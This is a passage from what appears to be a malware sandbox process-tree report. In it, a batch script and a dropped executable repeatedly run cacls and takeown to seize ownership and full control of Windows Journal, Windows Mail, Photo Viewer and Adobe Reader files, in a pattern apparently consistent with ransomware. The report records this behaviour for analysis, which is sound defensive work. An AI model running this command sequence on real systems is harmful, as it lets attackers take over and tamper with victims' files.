PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui""2⤵
- Loads dropped DLL
PID:1504 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1900 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:832
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵
- Loads dropped DLL
PID:1848 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1516
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui""2⤵
- Loads dropped DLL
PID:900 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵
- Loads dropped DLL
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵
- Executes dropped EXE
PID:1856
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""2⤵
- Loads dropped DLL
PID:324 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵
- Loads dropped DLL
PID:1984 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:1184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵PID:1712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "cryptocme2.sig" -nobanner3⤵
- Loads dropped DLL
PID:848 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "cryptocme2.sig" -nobanner4⤵
- Executes dropped EXE
PID:832
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui""2⤵
- Loads dropped DLL
PID:1588 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:1356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui""2⤵
- Loads dropped DLL
PID:1744 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui" /E /G Admin:F /C3⤵PID:1612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:1812
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui""2⤵
- Loads dropped DLL
PID:1196 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:680 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1172
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui""2⤵
- Loads dropped DLL
PID:1740 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:1324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C3⤵PID:1124
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Music.jtp" -nobanner3⤵PID:544
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Music.jtp" -nobanner4⤵
- Executes dropped EXE
PID:588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1724
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1648
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵PID:1900
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui""2⤵PID:620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:1516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Journal.exe""2⤵PID:1104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C3⤵PID:1616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Journal.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Journal.exe" -nobanner3⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Journal.exe" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""2⤵PID:1784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Seyes.jtp" -nobanner3⤵PID:324
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Seyes.jtp" -nobanner4⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui""2⤵PID:1972
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:2004
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1612
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:804
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1856
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1120
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""2⤵PID:1688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1324
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1824
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵PID:1624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:1612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:1724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:1784
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:1356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵PID:324
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵PID:1160
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui""2⤵PID:1776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui""2⤵PID:628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:1104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵PID:1784
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C3⤵PID:1356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Genko_1.jtp" -nobanner3⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Genko_1.jtp" -nobanner4⤵PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:1848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "email_all.gif" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "email_all.gif" -nobanner4⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:1712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵PID:408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:324
-
